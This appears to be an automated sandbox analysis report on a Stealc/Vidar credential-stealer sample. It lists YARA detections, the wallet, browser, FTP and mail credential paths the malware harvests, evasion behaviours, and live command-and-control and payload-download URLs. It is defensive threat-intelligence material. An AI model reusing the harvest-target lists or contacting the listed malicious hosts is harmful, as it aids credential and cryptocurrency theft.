Source: Yara match File source: 00000013.00000002.3241989382.00000000003A1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2340448283.00000000007F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3241787684.00000000007F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2669468186.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000022.00000002.3056135980.00000000025CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2382069321.00000000024A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2765136724.0000000002536000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 624f4d727e.exe PID: 8016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 624f4d727e.exe PID: 6648, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 2764, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: passphrase.json
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: \Ethereum\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: Ethereum
Source: file.exe String found in binary or memory: file__0.localstorage
Source: file.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: bdb44f72d9.exe, 0000001B.00000002.3241111543.0000000000372000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: bdb44f72d9.exe, 0000001B.00000002.3266173566.0000000001BE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XPP<R
Source: bdb44f72d9.exe, 00000017.00000002.3267274655.0000000001D82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XPU
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.2382069321.00000000024E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2764, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 00000022.00000002.3056135980.00000000025CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2382069321.00000000024A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2765136724.0000000002536000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 624f4d727e.exe PID: 8016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 624f4d727e.exe PID: 6648, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 2764, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C790C40 sqlite3_bind_zeroblob, 0_2_6C790C40
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483400 Sample: file.exe Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 88 www.youtube.com 2->88 90 spocs.getpocket.com 2->90 92 13 other IPs or domains 2->92 100 Multi AV Scanner detection for domain / URL 2->100 102 Found malware configuration 2->102 104 Malicious sample detected (through community Yara rule) 2->104 106 17 other signatures 2->106 9 file.exe 39 2->9         started        14 explorti.exe 2->14         started        16 explorti.exe 2->16         started        18 5 other processes 2->18 signatures3 process4 dnsIp5 94 85.28.47.31, 49704, 49734, 80 GES-ASRU Russian Federation 9->94 96 185.215.113.16, 49705, 49727, 49728 WHOLESALECONNECTIONSNL Portugal 9->96 74 C:\Users\user\AppData\RoamingCFCGIIEHIE.exe, PE32 9->74 dropped 76 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->76 dropped 78 C:\Users\user\AppData\Local\...\random[1].exe, PE32 9->78 dropped 80 12 other files (8 malicious) 9->80 dropped 122 Detected unpacking (changes PE section rights) 9->122 124 Detected unpacking (overwrites its own PE header) 9->124 126 Tries to steal Mail credentials (via file / registry access) 9->126 138 6 other signatures 9->138 20 cmd.exe 1 9->20         started        22 cmd.exe 1 9->22         started        24 WerFault.exe 19 16 9->24         started        98 185.215.113.19, 49726, 49731, 80 WHOLESALECONNECTIONSNL Portugal 14->98 128 Creates multiple autostart registry keys 14->128 130 Hides threads from debuggers 14->130 132 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->132 27 bdb44f72d9.exe 14->27         started        30 624f4d727e.exe 14->30         started        134 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->134 136 Binary is likely a compiled AutoIt script file 18->136 32 firefox.exe 18->32         started        35 firefox.exe 18->35         started        37 WerFault.exe 18->37         started        39 WerFault.exe 18->39         started        file6 signatures7 process8 dnsIp9 41 RoamingCFCGIIEHIE.exe 4 20->41         started        45 conhost.exe 20->45         started        47 userAKKKFBGDHJ.exe 4 22->47         started        49 conhost.exe 22->49         started        68 C:\ProgramData\Microsoft\...\Report.wer, Unicode 24->68 dropped 140 Detected unpacking (changes PE section rights) 27->140 142 Binary is likely a compiled AutoIt script file 27->142 144 Hides threads from debuggers 27->144 51 firefox.exe 27->51         started        146 Detected unpacking (overwrites its own PE header) 30->146 53 WerFault.exe 30->53         started        82 youtube-ui.l.google.com 142.250.184.238 GOOGLEUS United States 32->82 84 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 32->84 86 5 other IPs or domains 32->86 55 firefox.exe 32->55         started        57 firefox.exe 32->57         started        59 firefox.exe 35->59         started        file10 signatures11 process12 file13 70 C:\Users\user\AppData\Local\...\explorti.exe, PE32 41->70 dropped 108 Antivirus detection for dropped file 41->108 110 Detected unpacking (changes PE section rights) 41->110 112 Machine Learning detection for dropped file 41->112 120 3 other signatures 41->120 61 explorti.exe 41->61         started        72 C:\Users\user\AppData\Local\...\axplong.exe, PE32 47->72 dropped 114 Tries to evade debugger and weak emulator (self modifying code) 47->114 116 Hides threads from debuggers 47->116 118 Tries to detect sandboxes / dynamic malware analysis system (registry check) 47->118 64 axplong.exe 47->64         started        66 firefox.exe 59->66         started        signatures14 process15 signatures16 148 Antivirus detection for dropped file 61->148 150 Detected unpacking (changes PE section rights) 61->150 152 Tries to detect sandboxes and other dynamic analysis tools (window names) 61->152 160 2 other signatures 61->160 154 Machine Learning detection for dropped file 64->154 156 Tries to evade debugger and weak emulator (self modifying code) 64->156 158 Hides threads from debuggers 64->158
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
85.28.47.31
 unknown Russian Federation
31643 GES-ASRU true
185.215.113.19
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 prod.ads.prod.webservices.mozgcp.net United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
142.250.184.238
 youtube-ui.l.google.com United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
youtube-ui.l.google.com 142.250.184.238 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
ipv4only.arpa 192.0.0.171 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
contile.services.mozilla.com 34.117.188.166 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
spocs.getpocket.com unknown unknown
detectportal.firefox.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
www.youtube.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://85.28.47.31/8405906461a5200c/vcruntime140.dll true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://185.215.113.19/Vi9leo/index.php true
  • 2%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.31/8405906461a5200c/softokn3.dll true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.31/8405906461a5200c/nss3.dll true
  • 10%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown